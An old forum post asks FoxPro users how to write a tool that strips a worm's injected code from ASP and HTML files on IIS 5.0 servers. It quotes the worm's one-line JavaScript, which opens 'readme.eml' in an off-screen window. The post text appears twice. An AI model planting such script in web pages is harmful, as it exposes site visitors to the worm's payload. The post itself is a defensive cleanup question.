Hi all,
I am not sure if this has anything to do with the FoxPro forum, but members of this forum seem to be really helpful.
Well recently there is currently a worm virus that attacks IIS 5.0. This is actually also mention on the IIS forum.
Basically what the worm does is that it writes the following piece of code into all ASP and HTML files.
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000"
</script></html>
Currently I don't think there's a solution to remove this piece of line of code from any anti virus program.
I would need to write a custom program to actually read all ASP and HTML files and remove that piece of code. My question is that should i use foxpro file functions or write the custom program in C++. If in FoxPro can it be done?
Thanks for any advice.
YJ
I am not sure if this has anything to do with the FoxPro forum, but members of this forum seem to be really helpful.
Well recently there is currently a worm virus that attacks IIS 5.0. This is actually also mention on the IIS forum.
Basically what the worm does is that it writes the following piece of code into all ASP and HTML files.
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000"
Currently I don't think there's a solution to remove this piece of line of code from any anti virus program.
I would need to write a custom program to actually read all ASP and HTML files and remove that piece of code. My question is that should i use foxpro file functions or write the custom program in C++. If in FoxPro can it be done?
Thanks for any advice.
YJ